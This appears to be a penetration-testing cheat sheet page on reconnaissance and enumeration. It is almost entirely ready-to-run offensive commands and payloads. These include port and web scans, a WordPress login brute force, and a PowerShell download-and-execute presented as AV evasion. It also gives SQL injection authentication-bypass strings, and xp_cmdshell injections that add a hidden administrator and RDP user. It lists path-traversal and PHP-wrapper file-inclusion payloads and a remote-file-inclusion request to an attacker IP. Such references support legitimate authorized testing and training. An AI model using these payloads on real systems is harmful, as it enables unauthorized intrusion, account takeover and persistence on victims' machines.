Reconnaissance & enumeration

Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:

script target.log

Port scanning

Nmap

nmap -A -sS -Pn -n x.x.x.x

Scan all UDP port without a retry

nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x

Nc

nc -nvv -w 1 -z x.x.x.x 1-100

This nc command can be very useful to check egress filtering -> see below

PowerShell (in memory -> AV evasion)

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"

Host enum

nikto -h x.x.x.x

enum4linux x.x.x.x

Is the target 32 or 64 bit? https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py

python getArch.py -target x.x.x.x

DNS zone transfer

dig axfr domain.com @nameserver

Web fuzzing

Gobuster

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php

Wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ

wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ

Samba (SMB)

Do not underestimate this one ;)

smbclient -L x.x.x.x

nmap --script=smb-check-vulns.nse x.x.x.x

smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor

mount -t cifs //x.x.x.x/share /mnt

mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt

smbclient \\\\x.x.x.x\\share

Anonymous bind using rpcclient:

rpcclient -U "" x.x.x.x

SNMP

Scan using the default community string:

snmpwalk -c public -v1 x.x.x.x

Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x

CMS

CMSmap

cmsmap.py https://x.x.x.x

WPscan

wpscan --url https://x.x.x.x

Bruteforce login:

wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10

SQL injection

Test for authentication bypass

1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x

Use time delays to find injectable parameter

';WAITFOR DELAY '0:0:5'--

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'

If the above works try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

xp_cmdshell - test ping

';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --

xp_cmdshell - add admin user

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --

xp_cmdshell - add admin user and to RDP group

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --

Local File Inclusion (LFI)

Basic checks

Linux

../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500

Windows

../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500

../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500

Wordlists: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

LFI Wrappers

expect://

http://x.x.x.x/blah?parameter=expect://whoami

data://

http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>

input://

http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>

LFI to RCE

Just check: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):

GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First start TCPdump at your own box

tcpdump -i eth0

Run at target (where x.x.x.x is your attacking box)

nc -nvv -w 1 -z x.x.x.x 1-100

Files and file systems

Unmounted file systems

cat /etc/fstab

World writeable directories

find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World writeable files

find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Writeable config files

find /etc/ -writable -type f 2>/dev/null

PreviousIntroduction NextGaining access

Last updated 5 years ago

hashtagBash log

hashtagPort scanning

hashtagNmap

hashtagNc

hashtagPowerShell (in memory -> AV evasion)

hashtagHost enum

hashtagDNS zone transfer

hashtagWeb fuzzing

hashtagSamba (SMB)

hashtagSNMP

hashtagCMS

hashtagCMSmap

hashtagWPscan

hashtagSQL injection

hashtagTest for authentication bypass

hashtagUse time delays to find injectable parameter

hashtagLocal File Inclusion (LFI)

hashtagBasic checks

hashtagLFI Wrappers

hashtagLFI to RCE

hashtagRemote File Inclusion (RFI)

hashtagCheck for egress filtering

hashtagFiles and file systems

hashtag